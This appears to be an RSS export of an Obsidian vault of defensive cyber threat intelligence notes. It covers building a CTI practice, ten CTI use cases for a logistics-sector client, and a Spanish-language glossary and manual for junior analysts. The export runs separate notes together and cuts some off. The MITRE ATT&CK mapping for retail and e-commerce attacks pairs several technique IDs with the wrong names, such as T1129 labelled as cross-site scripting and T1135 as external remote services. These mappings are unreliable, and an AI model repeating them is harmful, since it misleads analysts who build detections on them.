http://github.com/dylang/node-rsssite-lib/media/favicon.pngWebpage HTML Export plugin for ObsidianWed, 29 Apr 2026 12:21:48 GMTWed, 29 Apr 2026 12:19:20 GMT60Figure 1 - The CTI lifecycle.CTI feeds, especially commercially available feeds, often require considerable subscription fees and technology investments. Ensure that your CTI practice can measure the value of new CTI feeds to your stakeholders. Only ramp up your CTI feed investments when you clearly understand their impact.New technologies have emerged to support common challenges with implementing or improving the capabilities of a CTI practice, and these tools, such as advanced Threat Intelligence Platforms (TIPs), can provide a fast and easy way to deploy a core set of workflows and processes. Ensure that the workflow functionality of your planned technology platform meets the complete business requirements of your CTI practice.Creating business value from CTI relies on a nuanced understanding of the information needs of the key stakeholders in the organization. Even with the support of a CTI practice, it ultimately falls upon these stakeholders to execute a successful strategy to deter, defeat, and prevent cyberattacks. To make a positive impact on the business, the CTI team must understand the questions that stakeholders need answered, and how and at what cadence they prefer to consume intelligence.For a CTI practice to succeed, stakeholders must be comfortable with a shared vision and a long-term plan for ongoing security. Ensure stakeholders understand how much you want to accomplish, at what pace, in what steps, and with what business constraints. Deliver on promises with measurable results.Your CTI practice must provide comprehensive support to multiple business functions, both inside and outside of IT: SOCs require structured indicators and warning signals associated with key threats in machine-readable formats such as CSV and STIX, or vendor-specific formats. Vulnerability management teams require written intelligence on emerging, high-impact vulnerabilities and known exploitation vectors to IT systems. IR and operations teams require ad hoc, customized intelligence related to TTPs, associated campaigns, actor intents and attributions, and forensic data on points of compromise. Business stakeholders require regular updates on critical threats to their areas of responsibility, with assessments of potential impacts on business operations. IT architects require up-to-date communications on critical threats to IT security to ensure alignment between the configuration of IT infrastructure and new cyber threats. Executives and decision makers require periodic high-level reports on exposures and critical threats the organization faces. The last step to setting up your CTI practice is implementing processes and practices that improve stakeholders' ability to defeat present attacks, deter ongoing actions, and prevent future attacks.Building a CTI practice is a complex undertaking that takes considerable time and money. To justify this investment, you must determine if you are getting the best outcome from your CTI analyst team, if their intelligence is actionable, and if you are satisfying your stakeholders. You need highly mature processes in order to draw these conclusions. CTI must be a distinct organizational competency — not buried within IT security Team composition matters — intelligence training, project management, risk management, and hands-on technical experience are all required The CTI lifecycle (Direction, Collection, Analysis, Dissemination) drives disciplined operations Feed value must be measured — avoid over-investment in feeds without demonstrable impact Stakeholder-centric delivery is essential — each group (SOC, VM, IR, executives) needs different formats and cadences Maturity programs provide the framework to measure ROI and continuously improve Use this as a framework when designing or evaluating a CTI program for a client Steps 1-3 map to the initial setup phase of any CTI program proposal Steps 4-6 correspond to operational tooling and process design Steps 7-10 address long-term sustainability and stakeholder alignment Compare with analisis-inteligencia-competitiva-cyber360 for a concrete implementation example
EclecticIQ White Paper: A Stakeholder-centric Approach to Building a High-performing CTI Practice
EclecticIQ Blog
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/10-steps-comprehensive-cti-practice.htmlProjects/cti/10-steps-comprehensive-cti-practice.mdTue, 28 Apr 2026 15:51:48 GMT<figure><img src="https://blog.eclecticiq.com/hs-fs/hubfs/_blogs/others/cti-lifecycle.jpg?width=546&height=351&name=cti-lifecycle.jpg"></figure>tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/cti-reconciliation.htmlProjects/cti/cti-reconciliation.mdTue, 28 Apr 2026 15:51:48 GMT10-steps-comprehensive-cti-practice
cti-reconciliation
adversary-emulation-red-team
application-security-software-lifecycle
bloodhound-active-directory-queries
breach-intelligence-darknet-monitoring
caso-elecciones-francesas-2017-desinformacion
cti-automation-timely-protection
cti-theory-vs-experience
cti-toolkit-overview
cybersecurity-journey-soc-analyst
docker-analysis
estudio-enumeracion-vulnerabilidades-auth
formula-combinatoria-convergencia-osint
inteligencia-deteccion-ttps-hunting-playbooks
itca-windows-linux-firewalls
network-security-study-guide
otan-uint-operational-playbook
otan-uint-plan-accion-operativo proceso-replicar-investigacion-actores
programa-academico-analista-inteligencia programa-cti-diseno-integracion-madurez
recorded-future-ai-evolution
recorded-future-cti-guide
scanning-ports-ssh
threat-modeling-llm-banking
what-is-threat-intelligence ]]>themes/tema-cti-articulos-y-casos-de-estudio.htmlThemes/tema-cti-articulos-y-casos-de-estudio.mdTue, 28 Apr 2026 15:51:48 GMTuse-case-07-threat-hunting. programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica analisis-inteligencia-competitiva-cyber360
tema-cti-use-cases-marco ]]>projects/cti/use-case-01-intelligence-platform-alerts.htmlProjects/cti/use-case-01-intelligence-platform-alerts.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-07-threat-hunting).
Vulnerability Management Integration: Cross-reference threat intelligence with vulnerability scanner results for risk-based prioritization of patching (feeds into use-case-03-vulnerability-intelligence). Risk-scored and contextualized IOC database SIEM correlation rules based on enriched IOCs Threat hunting leads from contextualized intelligence Vulnerability prioritization recommendations Feed quality metrics and value assessments Maltiverse - IoC threat scoring and enrichment VirusTotal Enterprise - Multi-engine malware analysis and IOC lookup AlienVault OTX - Community-driven threat intelligence Recorded Future Intelligence - Premium threat intelligence with predictive analytics MISP - Open-source threat intelligence sharing platform Maltiverse VirusTotal Enterprise AlienVault OTX Recorded Future Intelligence MISP Reduced False Positives: Risk-based filtering and contextualization helps minimize noise and analyst fatigue. Improved Detection Accuracy: High-confidence IOCs and insights on threat context enhance the effectiveness of security controls. Faster Incident Response: Enriched IOCs and risk scores provide analysts with the information needed to understand alerts and take decisive actions. Proactive Defense: Intelligence-driven hunting and vulnerability prioritization enable proactive hardening of the environment. Feedback Loop: Implement a process to evaluate the value of feeds. Track how use of the intelligence improves detection and response, and identify any need for adjustments.
Threat Sharing: If applicable, consider integrating the MISP instance to contribute to and benefit from community-driven threat intelligence (see use-case-10-threat-intel-sharing). programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica
analyzing-ti-feeds-overlap-novelty
data-feeds-vs-intelligence
threat-intelligence-feeds
tema-cti-use-cases-marco ]]>projects/cti/use-case-02-cti-feeds.htmlProjects/cti/use-case-02-cti-feeds.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-02-cti-feeds)
ASM findings (from use-case-01-intelligence-platform-alerts) Asset Mapping: Map the organization's technology stack against known vulnerability databases. CVE Filtering: Filter newly published CVEs for relevance to the organization's assets. Exploitation Context Enrichment: Cross-reference with CISA KEV (Known Exploited Vulnerabilities) and Exploit-DB to determine active exploitation status. Risk Scoring: Assign contextualized risk scores combining CVSS base score, exploitation likelihood, asset criticality, and exposure. Prioritized Reporting: Generate prioritized vulnerability reports for the VM team and SOC. Remediation Tracking: Track patching progress and re-evaluate risk as mitigations are applied. Prioritized CVE reports filtered by technology stack relevance Active exploitation alerts for critical vulnerabilities Risk-based patching recommendations
Vulnerability trend analysis for use-case-08-strategic-intel-report NVD (National Vulnerability Database) CISA KEV (Known Exploited Vulnerabilities catalog) Exploit-DB (public exploit database) Vendor security advisories
CTI feeds (from use-case-02-cti-feeds) NVD API CISA KEV catalog Exploit-DB Vulnerability scanners (Qualys, Nessus, etc.) SIEM for correlation Reduction in mean time to patch (MTTP) for actively exploited vulnerabilities Percentage of critical CVEs identified before exploitation in the wild Coverage of technology stack in vulnerability monitoring Reduction in vulnerability-related incidents programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica
detection-mitigation-common-attacks
tema-cti-use-cases-marco ]]>projects/cti/use-case-03-vulnerability-intelligence.htmlProjects/cti/use-case-03-vulnerability-intelligence.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-01-intelligence-platform-alerts) Dark Web Forums: Monitor underground markets where stolen credentials are often bought and sold. Paste Sites: Scan paste sites (e.g., Pastebin) for publicly exposed credential dumps.
Credential Leak Databases: Utilize services like "Have I Been Pwned?" (https://haveibeenpwned.com/) to search known breaches. Internal Logging: Correlate with internal security logs to identify potential infections within the network. Analyze compromised credential data in structured format: Prioritize alerts based on credential sensitivity and user role (e.g., privileged accounts) Assess whether leaked credentials provide access to critical systems Determine if session tokens are still valid Inform Users: Alert affected users immediately, so they can change passwords across all services where they use the same credentials. Reset Passwords & Harden Account Configurations: Enforce password resets. Consider deploying multi-factor authentication (MFA). Eradicate Malware: Investigate compromised systems, remove infostealers, and remediate the infection. Security Awareness Training: Educate users about credential risks and best practices. Compromised credential alerts with risk scoring Infostealer campaign analysis reports Affected user notifications Remediation action tracking Credential hygiene metrics Dark web forums and underground markets Paste sites (Pastebin, etc.) Credential leak databases (Have I Been Pwned, etc.) Infostealer malware analysis feeds Internal SIEM and EDR logs HaveIBeenPwned Hudson Rock Darknet monitoring platforms Early Detection: Time from credential compromise to detection Proactive Response: Time from detection to password reset/MFA enforcement Improved User Education: Reduction in credential reuse incidents after awareness training Targeted Defense: Number of infostealer infections identified and remediated Customer Support Team: Helpdesk personnel can proactively assist users with compromised accounts. CSIRT Team: Provides critical threat intelligence for incident response and malware analysis. Security Operations Center (SOC): Enhances threat detection and hunting capabilities. IT Administrators: Enforces stronger password policies and multi-factor authentication. Automation: Integrate monitoring into existing security workflows to streamline response actions. Legal/Compliance: Understand any legal reporting obligations (data breach notification laws). programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica Plantilla Informe CTI - OSINT DATA LEAK
tema-cti-use-cases-marco ]]>projects/cti/use-case-04-infostealer-monitoring.htmlProjects/cti/use-case-04-infostealer-monitoring.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-01-intelligence-platform-alerts
Enriched IOCs from use-case-02-cti-feeds
Vulnerability intelligence from use-case-03-vulnerability-intelligence
Infostealer alerts from use-case-04-infostealer-monitoring External threat reports and advisories Industry news and security research publications Aggregate inputs from all upstream use cases and external sources Filter for high-priority threats relevant to the organization Select maximum of 5 intelligence items Each intelligence item follows this structure: Observation (What): Clearly state the threat/vulnerability. Relevance (Why): Briefly explain why this matters to the organization. Recommendation (How): Provide 1-2 specific, immediately actionable steps. Beneficiaries (Who): List the teams/roles best positioned to act. Maximum of 5 intelligence items: Focus on high-priority threats. Concise summaries: Get straight to the point for rapid action. Action-oriented: Prioritize clear recommendations for response. Automate initial analysis: Train ChatGPT to extract observations and draft recommendations from articles. Human oversight is essential: A CTI analyst should review for accuracy, context, and tailoring of advice within the organization's risk landscape. Daily Cyber Threat Intelligence Alert Observation: The LockBit 3.0 ransomware builder has been leaked, enabling the creation of new ransomware variants with modified tactics. Relevance: Our organization is vulnerable to ransomware attacks, which could significantly disrupt operations and damage reputation. Recommendation: Immediately review ransomware response plans and consider running a tabletop exercise to test readiness. Patch systems promptly and reiterate vigilance against phishing emails to staff. Beneficiaries: Incident Response Team, IT Operations, Security Awareness Team
All upstream use case outputs (use-case-01-intelligence-platform-alerts through use-case-04-infostealer-monitoring) Industry-specific threat reports Vendor security bulletins Government cybersecurity advisories (CISA, CERTs) Open-source intelligence (OSINT) platforms Security research publications TIP (Threat Intelligence Platform) ChatGPT (optional, for initial analysis automation) Stakeholder satisfaction and engagement with daily reports Time from threat emergence to report distribution Percentage of recommendations acted upon within 24 hours Reduction in mean time to respond (MTTR) for reported threats Prioritization: Use color-coding or simple ranking (High/Medium/Low) to signal urgency. Contextualization: Briefly link the threat to the organization's specific assets or past incidents. Escalation: Include contact information for rapid incident reporting if further analysis is needed. programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica
threat-intelligence-feeds
resumen-semanal-ciberseguridad Plantillas de prompts para reportes CTI, vulnerabilidades y newsletters biblioteca-de-prompts-para-reportes-cti-y-threat-hunting
tema-cti-use-cases-marco ]]>projects/cti/use-case-05-daily-cti-report.htmlProjects/cti/use-case-05-daily-cti-report.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-01-intelligence-platform-alerts serve as foundational inputs. Status: This use case has minimal body content in the original and requires further development. Detect, analyze, and respond to phishing campaigns targeting the organization, including brand impersonation, BEC attacks, and sector-specific fraud schemes, to reduce successful social engineering attacks and protect employees, customers, and brand reputation. Domain and brand keyword lists (from use-case-00-keywords-repository)
Impersonation detection alerts (from use-case-01-intelligence-platform-alerts) Phishing feed data (URLs, domains, sender IPs) Email gateway logs and quarantine data User-reported phishing emails
Infostealer credential data (from use-case-04-infostealer-monitoring) Phishing Feed Ingestion: Aggregate and filter phishing indicators from external feeds and internal email gateway telemetry.
Impersonation Correlation: Cross-reference with domain impersonation alerts and typosquatting detection from use-case-01-intelligence-platform-alerts. Campaign Analysis: Cluster related phishing indicators to identify coordinated campaigns. BEC Detection: Identify Business Email Compromise patterns targeting executives and finance teams. IOC Extraction: Extract phishing IOCs (URLs, domains, sender IPs, file hashes) for operationalization. Takedown Coordination: Initiate takedown procedures for identified phishing domains and infrastructure. User Notification: Alert affected users and distribute awareness advisories. Phishing campaign analysis reports Extracted phishing IOCs for SIEM/email gateway rules Takedown requests for malicious domains User awareness advisories
Phishing trend analysis for use-case-08-strategic-intel-report Phishing feed providers Email gateway telemetry User-reported phishing emails Domain monitoring (typosquatting, lookalike domains) Social media impersonation alerts Industry phishing threat reports Phishing feeds Email gateway (anti-phishing, anti-spam) Domain monitoring platforms Takedown service providers Mean time to detect phishing campaigns Number of phishing domains taken down Reduction in successful phishing attacks User phishing report rate (awareness indicator) BEC attempt detection rate programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica
plan-ejercicio-vishing
caso-marks-spencer-scattered-spider
tema-cti-use-cases-marco
tema-phishing-completo ]]>projects/cti/use-case-06-phishing-intelligence.htmlProjects/cti/use-case-06-phishing-intelligence.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-02-cti-feeds
Platform alerts and anomalies from use-case-01-intelligence-platform-alerts
Vulnerability exploitation data from use-case-03-vulnerability-intelligence
Infostealer IOCs from use-case-04-infostealer-monitoring Network logs, endpoint data, and threat intelligence feeds
Sector-specific attack patterns from use-case-09-mitre-ecommerce-retail Intelligence-Driven: Threat hunting should be steered by up-to-date CTI, focusing on likely threat actor tactics, techniques, and procedures (TTPs) relevant to the industry and the current threat landscape. Iterative: Threat hunting is not a one-off task; it should be a continuous, cyclical process. Clearly define the potential threat actor (e.g., state-sponsored group, cybercriminal syndicate, hacktivists) with details about their typical motivations and capabilities. Specify the assets/systems most likely to be targeted by this threat actor. Outline potential attack methods and TTPs associated with the threat actor. Hypothesis-Based: Frame the search based on well-defined theories derived from CTI. Data Selection: Determine relevant data sources for the hunt (e.g., network logs, endpoint data, threat intelligence feeds). Hunting Techniques: Choose appropriate methods (e.g., anomaly detection, pattern matching, behavioral analysis). Tools: Identify the necessary security tools for data analysis, visualization, and correlation. Detail any indicators of compromise (IOCs) discovered such as suspicious domain names, file hashes, or unusual network activity. Describe any evidence of the hypothesized threat actor's presence (or lack thereof). Assess the potential damage if the threat materialized (data exfiltration, disruption, etc.). Prioritize findings based on severity and potential impact. Evaluate the likelihood of the hypothesized threat being an active concern, backed by available evidence. If the threat isn't confirmed, consider if any other threats were uncovered during the hunt. Immediate Actions: Containment & eradication steps to counter detected threats. Detection Improvements: Suggest changes to security controls (SIEM rules, network monitoring) to improve visibility for similar threats in the future. Proactive Measures: Propose long-term security posture refinements (user training, vulnerability patching, configuration hardening) to reduce the risk from the threat landscape in general. Hypothetical Threat: A nation-state backed APT group known for targeting intellectual property in the technology sector. Methodology: Analyze network logs and endpoint data, looking for beaconing behavior, lateral movement techniques, and anomalous tool usage. Impact: Possible exfiltration of sensitive R&D data, leading to a loss of competitive advantage. Threat hunting reports (per hunt cycle) Discovered IOCs and anomalies SIEM rule recommendations based on findings Detection gap analysis Updated threat actor profiles Internal SIEM and EDR telemetry Network flow and DNS logs Endpoint behavioral data External CTI feeds and reports MITRE ATT&CK framework Threat actor intelligence databases SIEM (Security Information and Event Management) EDR (Endpoint Detection and Response) TIP (Threat Intelligence Platform) MITRE ATT&CK Navigator Number of previously undetected threats identified per hunt cycle New SIEM detection rules created from hunting findings Mean time from hypothesis to conclusion Percentage of hunts resulting in actionable findings Improvement in detection coverage over time Collaboration: Threat hunting is often most effective when analysts, SOC teams, and incident responders work together. Documentation: Thoroughly document hunts for future reference and to inform security improvement strategies. Metrics: Track the outcomes of hunts over time to measure their effectiveness and refine the approach. programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica biblioteca-de-prompts-para-reportes-cti-y-threat-hunting
threat-actor-search
cti-offensive-security-github-tools
tema-cti-use-cases-marco ]]>projects/cti/use-case-07-threat-hunting.htmlProjects/cti/use-case-07-threat-hunting.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-05-daily-cti-report
Threat hunting findings from use-case-07-threat-hunting
Feed intelligence from use-case-02-cti-feeds
Vulnerability trends from use-case-03-vulnerability-intelligence Establish a curated set of trusted external intelligence sources, including: Industry-specific threat reports Vendor security bulletins Government cybersecurity advisories Open-source intelligence (OSINT) platforms Reputable security blogs and research publications Implement tools to continuously monitor these sources. Use keyword searches, reputation scoring, and other techniques to filter for reports relevant to the organization's industry, technology stack, and risk profile.Assign threat analysts to: Quickly evaluate filtered reports for potential criticality. Prioritize those that pose the highest risk to the organization. For high-priority reports, create standardized summaries with the following: Threat: Concise description of the threat actor, tactics, and targets. Relevance: Specific ways the threat could impact the organization's assets and operations. Recommendations: Clear, actionable steps to mitigate the risk (both vendor-provided and analyst-inferred). Gap Analysis: Highlight potential weaknesses in existing security controls based on the recommendations. Risk Assessment: Assign a risk score based on the threat's likelihood and potential impact, adjusted for current defenses. Industry-specific threat reports Vendor security bulletins Government cybersecurity advisories (CISA, CERTs, ENISA) OSINT platforms Reputable security blogs and research publications Internal threat hunting and incident data OSINT platforms Vendor feeds TIP (Threat Intelligence Platform) Enhanced Situational Awareness: Decision-makers have a clearer picture of the evolving threat landscape. Proactive Risk Mitigation: Targeted security improvements implemented before threats materialize. Optimized Resource Allocation: Security efforts prioritized based on the most relevant external intelligence. Continuous Improvement: Feedback loop refines internal security processes and controls. CISOs & Security Leaders: For strategic decision-making and resource allocation. SOC Analysts: To augment threat hunting and incident response. Vulnerability Management Teams: To prioritize patching and remediation efforts. IT Operations: To inform infrastructure hardening and configuration changes. Compliance Teams: To demonstrate alignment with industry best practices. Integrate with Internal Systems: Link intelligence reports with existing vulnerability databases, asset inventories, and incident response tools for smoother workflows. Report Sharing: Determine the appropriate audiences and communication methods for distributing the distilled intelligence reports. Analyst Training: Invest in ongoing training for analysts in analyzing external intelligence and mapping it to internal risks. programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica analisis-inteligencia-competitiva-cyber360
threat-intelligence-feeds
threat-intelligence-feeds mxdr-integration-roadmap Resumen de Inteligencia - Amenazas al Sector Retail y ECommerce-Plantilla
tema-cti-use-cases-marco ]]>projects/cti/use-case-08-strategic-intel-report.htmlProjects/cti/use-case-08-strategic-intel-report.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-02-cti-feeds
Vulnerability intelligence for web applications from use-case-03-vulnerability-intelligence T1566 - Phishing T1566.001 - Spearphishing Attachment T1566.002 - Spearphishing Link T1566.003 - Spearphishing via Service T1190 - Exploit Public-Facing Application T1129 - Cross-Site Scripting (XSS) T1195 - Supply Chain Compromise T1195.001 - Compromise Software Supply Chain T1195.002 - Compromise Hardware Supply Chain T1195.003 - Compromise Software Dependencies and Development Tools T1189 - Drive-by Compromise T1135 - External Remote Services T1584 - Compromise Client-Side Target Tactics: Initial Access, Execution Techniques: Phishing (T1566) Spearphishing Attachment (T1566.001) Spearphishing Link (T1566.002) Spearphishing via Service (T1566.003) How it Works: Attackers attempt to trick victims (customers or employees) into revealing sensitive login credentials or downloading malware using carefully crafted emails or websites. Tactics: Execution, Persistence, Privilege Escalation, Credential Access, Discovery Techniques: SQL Injection (T1190) - Injecting malicious SQL code to manipulate the database. Exploit Public-Facing Application (T1190) - Exploiting vulnerabilities in public-facing web applications. Tactics: Initial Access, Persistence, Privilege Escalation, Defense Evasion Techniques: Supply Chain Compromise (T1195) Compromise Software Supply Chain (T1195.001) Compromise Hardware Supply Chain (T1195.002) Compromise Software Dependencies and Development Tools (T1195.003) How it Works: Attackers compromise third-party services or software components that the e-commerce platform relies on, providing an indirect route to the systems. Tactics: Initial Access, Collection, Credential Access, Exfiltration Techniques: Drive-by Compromise (T1189) - Compromising a legitimate website to redirect users to malicious sites. Application or API (T1189) - Injecting malicious code into web application frameworks or APIs. External Remote Services (T1135) - Compromising external services that the website utilizes. Client-side Target (T1584) - Focuses on compromising client-side systems (browsers, users' devices) through skimming scripts. How it Works: Attackers inject malicious JavaScript code into e-commerce websites to steal payment card information as customers enter it. Sector-specific ATT&CK technique mapping (documented above) SIEM detection rules aligned to mapped techniques Threat hunting hypotheses per attack category Security control gap analysis against mapped techniques Prioritized detection engineering roadmap
MITRE ATT&CK framework (https://attack.mitre.org/) Sector-specific threat reports (Retail/eCommerce) Magecart group tracking reports Web application security research Incident response case studies MITRE ATT&CK Navigator SIEM (for detection rule implementation) WAF (Web Application Firewall) CSP (Content Security Policy) monitoring Percentage of mapped techniques with active detection rules Number of hunting hypotheses generated from technique mapping Detection rate for each mapped attack category Time to detect Magecart-style injection attempts programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica
threat-actor-search
ems-stride-mitre-attack
detection-mitigation-common-attacks Resumen de Inteligencia - Amenazas al Sector Retail y ECommerce-Plantilla
tema-cti-use-cases-marco ]]>projects/cti/use-case-09-mitre-ecommerce-retail.htmlProjects/cti/use-case-09-mitre-ecommerce-retail.mdTue, 28 Apr 2026 15:45:04 GMTuse-case-02-cti-feeds
Strategic intelligence reports from use-case-08-strategic-intel-report
Sector-specific TTP mappings from use-case-09-mitre-ecommerce-retail
Anonymized credential leak data from use-case-04-infostealer-monitoring Organization's sharing policy and classification guidelines Define clear guidelines for: Types of intelligence to be shared Sharing formats (STIX/TAXII, MISP, etc.) Classification levels and handling procedures Data protection and privacy regulations Reciprocity expectations Industry Peers: Companies within the sector facing similar threats. Government Agencies: National, regional or local agencies (e.g., CISA, CERTs, Law Enforcement). Security Vendors: Providers of security solutions and threat data. Information Sharing Groups: Sector-specific ISACs/ISAOs or regional groups. Trusted Communities/Platforms: Leverage existing sharing platforms or create a dedicated space. Technical Integration: Employ APIs or standard protocols to automate intelligence exchange. Encryption and Access Control: Protect sensitive data in transit and at rest. Shared threat intelligence reports (STIX/TAXII format) MISP event contributions Partner relationship management documentation Sharing metrics and value assessments Internal CTI products (all upstream use cases) Partner-contributed intelligence ISAC/ISAO shared feeds Government advisories and alerts Community-driven platforms (MISP communities) MISP (Malware Information Sharing Platform) STIX/TAXII infrastructure TIP (Threat Intelligence Platform) Enhanced Situational Awareness: Understanding the evolving threat landscape through partner contributions. Proactive Defense: Anticipating attacks, hardening systems, patching vulnerabilities based on shared intelligence. Incident Response: Accelerated response through partner collaboration for containment. Risk Assessment: Quantified cyber risks justified by shared intelligence data. Compliance Alignment: Demonstrated industry collaboration and due diligence. Collective Resilience: Strengthened overall cybersecurity posture of the industry and region. Technical Stakeholders: Security teams, SOC analysts, incident responders, vulnerability management. Non-Technical Stakeholders: Business leaders, risk management, compliance officers, legal. Trust: Build relationships built on mutual benefit and reliability. Automation: Optimize sharing workflows for efficiency and timeliness. Feedback Loop: Analyze shared intelligence, refine processes, and contribute back to partners. programa CTI corporativo (cliente sector logistica)- programa CTI corporativo programa CTI cliente sector logistica
proactive-cti-collaboration
doctrina-minima-viable
doctrina-minima-viable
tema-cti-use-cases-marco ]]>projects/cti/use-case-10-threat-intel-sharing.htmlProjects/cti/use-case-10-threat-intel-sharing.mdTue, 28 Apr 2026 15:45:04 GMTcti-recursos-juniors-unificado. Seccion fuente: "B. Glosario express (lee esto primero)". El master sigue intacto para lectura lineal. Info Términos que aparecen sin parar en CTI/CTH y que no se explican porque "se asume". Aquí los tienes en una línea cada uno. Si no entiendes uno, búscalo aquí antes de seguir. Importado desde Inbox/Glosario de Acrónimos.md durante consolidacion bulk. Glosario exhaustivo creado para el Programa CTI de cliente sector logistica (empresa de correos y repartos). Contiene tres secciones principales: un diccionario alfabetico de 80+ acronimos del ecosistema CTI/ciberseguridad, una tabla de codigos de tecnicas MITRE ATT&CK relevantes, y un catalogo de herramientas y plataformas comerciales y open source utilizadas en operaciones de seguridad.Glosario generado para el programa CTI cliente sector logistica (cliente sector logistica) El glosario cubre todo el ciclo de inteligencia: desde la obtencion (ICP, CRL, CTL) hasta el consumo (PIR, SIR, EEI) Las tecnicas MITRE mapean los vectores mas relevantes para el perfil de amenaza de cliente sector logistica El catalogo de herramientas refleja el stack real del cliente (CrowdStrike como SIEM/EDR, Arcsight como legacy) Referencia rapida durante el analisis de incidentes y la redaccion de informes CTI Util como material de formacion para nuevos analistas del SOC/CTI Las tecnicas MITRE sirven como base para mapear detecciones en CrowdStrike
ec-council-ctia-cert -- Notas del curso de certificacion CTIA relacionadas
tema-cti-fundamentos-doctrina ]]>projects/doctrina/glosario-cti-cth.htmlProjects/doctrina/glosario-cti-cth.mdTue, 28 Apr 2026 15:45:04 GMTdata-breach-search-engines cataloga plataformas de búsqueda de datos comprometidos (Have I Been Pwned, DeHashed, Intelligence X, Leak-Lookup)
Foros underground: threat-actor-search documenta los principales foros de cibercriminales donde se negocian accesos y se publican leaks
Mercados: threat-actor-search cataloga mercados darknet donde se comercializan credenciales, accesos RDP, y datos robados
Data leaks directos: data-breach-search-engines recoge fuentes de monitorización de filtraciones masivas
Canales de comunicación: social-media-tools documenta canales de Telegram y otras plataformas donde los actores de amenazas publican y negocian caso de estudio CTI (anonimizado) demuestra una metodología de correlación avanzada: 119 emails correlacionados con estructura organizacional, análisis de centralidad de red, mapeo de liderazgo, y 8 correlaciones de alta confianza. Este tipo de análisis transforma datos brutos (listas de emails) en inteligencia accionable (mapa de exposición organizacional, vulnerabilidades BEC).
El use-case-04-infostealer-monitoring establece el flujo operativo para credenciales comprometidas: monitorización de feeds de infostealers → correlación con dominios del cliente → alerta al SOC → forzar reset de credenciales → verificar compromiso lateral.
threat-actor-search e threat-actor-search documentan el tracking de grupos de ransomware y sus víctimas, permitiendo early warning cuando un cliente o sector aparece en la lista de targets.Plantilla Informe CTI - OSINT DATA LEAK proporciona el template de reporte para incidentes de data leak: evidencia recolectada, análisis de impacto, recomendaciones de remediación, y timeline del compromiso. Este template estandariza la comunicación entre el equipo CTI y el cliente. La inteligencia darknet tiene valor temporal decreciente. Una credencial comprometida publicada hace 1 hora es una emergencia. La misma credencial 30 días después ya fue probada por cientos de bots. La velocidad del ciclo recolección→correlación→alerta determina el valor defensivo.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/breach-intelligence-darknet-monitoring.htmlProjects/cti/breach-intelligence-darknet-monitoring.mdTue, 28 Apr 2026 15:45:02 GMTA. Cómo usar este manual y qué hace un junior CTI/CTH
B. Glosario express (lee esto primero)
C. Doctrina mínima viable Parte II — Recursos operativos (lo que mandaron los juniors)
Resumen y atribución
Stack de herramientas day-to-day
Bookmarks web por categoría
Plantillas de reportes CTI (con hooks de doctrina) Parte III — Hacer el trabajo bien
D. Workflows del junior — 6 procedures step-by-step
E. Fuentes A1 / vendors gold standard
F. OPSEC del analista junior
G. Sesgos cognitivos a vigilar
H. Errores típicos del junior y cómo evitarlos
I. Roadmap 90 días junior CTI/CTH
J. Pruebas y entrenamiento (CTFs y plataformas)
K. Recursos integrados de la vault PAI Parte IV — Referencias originales
5. Prompts de IA (Feedly TRACCES)
6. Bookmarks personales de Fer
7. Notas y próximos pasosTu rol en una frase Como L1 (analista junior) de CTI/Threat Hunting trabajas en el ciclo de inteligencia — recoges información, la procesas, la analizas, la entregas, recibes feedback y vuelves a empezar. Tu output principal no son los datos: son juicios analíticos trazables, etiquetados con su nivel de confianza y de utilidad para el cliente. Profundiza en [[ciclo-de-inteligencia]]. Lo que un junior CTI hace típicamente en su semana: Triar alertas de SIEM/TIP que llegan a la cola del L1 Enriquecer IOCs (IP, dominio, hash) en VirusTotal, Shodan, GreyNoise, OTX Vigilar feeds de CVEs y reportar los críticos del tech stack del cliente Monitorear leaks (foros, Telegram, paste sites, stealer logs vía Flare/Hudson Rock) Escribir reportes cortos siguiendo plantillas (§4) con TLP, Admiralty, WEP Hacer threat hunting con reglas Sigma/YARA cuando llega una nueva campaña Mantener perfiles de threat actors relevantes para el cliente Lo que NO hace un junior (todavía): Atribuir campañas a actores nacionales — eso es trabajo senior con confidence calibrada Cerrar dominios con take-down ofensivo — eso es legal/ofensivo Tomar decisiones de respuesta — el junior recomienda; el cliente decide Hablar con el cliente sin supervisión en los primeros 90 días Lo más importante de tu primer mes Aprende a citar fuentes A1 (§E) y a aplicar el sistema Admiralty (§C.1) ANTES de escribir tu primer reporte. Aprende el TLP v2 (§C.3). Mandar un reporte sin TLP es como mandar un correo sin asunto: profesionalmente desastroso. Aprende el WEP (§C.2) y deja para siempre las palabras "seguro", "definitivo", "imposible". CTI vive de probabilidades calibradas, no de certezas. Info Términos que aparecen sin parar en CTI/CTH y que no se explican porque "se asume". Aquí los tienes en una línea cada uno. Si no entiendes uno, búscalo aquí antes de seguir. Important Estos 7 frameworks son los que no puedes no saber en tu primer mes. No te pido que los domines: te pido que sepas qué resuelve cada uno y dónde mirar la entidad en la vault para profundizar. Calificas fuente (A-F) y información (1-6) por separado. Permite que un titular Reuters cite a un tabloide y tú evalúes ambos.Ejemplos prácticos: Mandiant report sobre APT41 → A1 (vendor gold standard + datos forensics propios) Tweet de threat-hunter conocido pero sin enlace al artefacto → B3 Post anónimo en BreachForums anunciando leak → F6 (hasta validar muestra) Profundiza: [[entidad-admiralty-system]] Inventado por Sherman Kent en 1964 después de que Bahía de Cochinos saliera mal porque "very serious possibility" significaba 11% para uno y 65% para otro. Hoy es estándar ICD-203.Regla crítica para el junior NUNCA mezcles likelihood y confidence en la misma frase. Mal: 